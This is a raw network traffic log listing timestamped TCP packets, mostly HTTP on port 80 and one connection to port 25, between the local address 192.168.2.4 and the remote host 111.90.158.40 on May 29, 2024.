May 29, 2024 14:25:28.671334028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671334982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.671372890 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.671612978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671700001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671705961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.671735048 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671793938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671804905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671816111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.671839952 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.711988926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754422903 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754460096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754509926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754543066 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754559040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754592896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754625082 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754643917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754676104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754709959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754710913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754743099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754776001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754807949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754836082 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754841089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754875898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754904985 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754908085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754942894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.754971981 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.754977942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755013943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755047083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755075932 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.755079031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755112886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755141020 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.755145073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755178928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.755208015 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.755417109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.756056070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.756108999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.756140947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.756174088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.756205082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.756206989 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.756237030 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.843310118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.843327045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.843739033 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946176052 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946188927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946199894 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946219921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946230888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946269035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946279049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946290970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946319103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946321011 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946331024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946341991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946350098 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946356058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946366072 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946368933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946382999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946502924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946530104 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946553946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946564913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946593046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946609020 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946619034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.946620941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946634054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.946646929 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947210073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947235107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947242022 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947248936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947303057 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947303057 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947561026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947602987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947613001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947681904 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947747946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947765112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947773933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947776079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947789907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947805882 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947873116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947891951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947902918 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.947940111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.947967052 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948004007 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948023081 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948049068 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948081017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948092937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948168993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948187113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948194981 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948220968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948240042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948249102 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948395967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948415995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948422909 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948448896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948503017 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948503017 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948529005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948546886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948570967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948872089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948884964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948895931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948906898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948924065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.948966026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948983908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.948996067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949003935 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949003935 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949007988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949026108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949034929 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949063063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949085951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949091911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949136972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949147940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949160099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949163914 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949187040 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949238062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949258089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949280977 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949532032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949546099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949557066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949567080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949652910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949671984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949681997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949681997 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949709892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949723959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949727058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949727058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949734926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949821949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949834108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949843884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949871063 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949914932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949942112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.949979067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.949991941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950002909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950016022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950027943 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950087070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950104952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950114965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950114965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950126886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950139999 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950149059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950787067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950807095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950817108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950841904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950880051 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950908899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.950933933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950947046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950958014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950985909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.950998068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951009989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951010942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951035023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951064110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951075077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951201916 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951214075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951226950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951230049 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951239109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951251030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951251984 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951261044 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951263905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951289892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951308012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951366901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951378107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951387882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951416016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951416016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951425076 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951436996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951502085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951527119 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951544046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951575994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951586962 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951596022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951601982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951617956 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951678038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951708078 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.951710939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951725006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951805115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.951817036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:28.952402115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:28.952716112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035227060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035291910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035388947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035399914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035412073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035423040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035434008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035443068 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035446882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035458088 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035460949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035473108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035490036 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035491943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035507917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035525084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035526991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035541058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035552025 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035554886 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035563946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035574913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035587072 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035587072 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035598993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035604954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035613060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035624027 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035631895 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035638094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035650015 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.035659075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.035676956 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.036226988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036237955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036247969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036257982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036272049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036283016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036284924 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.036295891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036314964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.036331892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.036511898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036597013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036607981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036618948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036629915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.036642075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.036674023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.096885920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.096908092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.096920967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.096931934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.096962929 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.096988916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.109097958 CEST	49762	25	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.226813078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226850033 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226860046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226870060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226896048 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226905107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226913929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226929903 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226948023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226957083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226962090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.226970911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227020979 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227020979 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227020979 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227154970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227173090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227199078 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227494001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227504969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227514029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227524042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227531910 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227555990 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227659941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227685928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227698088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227699995 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227726936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227729082 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.227833986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227844954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.227880955 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228059053 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228070021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228079081 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228089094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228101969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228113890 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228523016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228533983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228543997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228553057 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228563070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228575945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228605032 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228856087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228869915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228879929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228892088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.228915930 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.228938103 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229301929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229320049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229401112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229413033 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229420900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229434013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229444027 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229450941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229464054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229469061 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229475975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229485989 CEST	80	49760	111.90.158.40	192.168.2.4
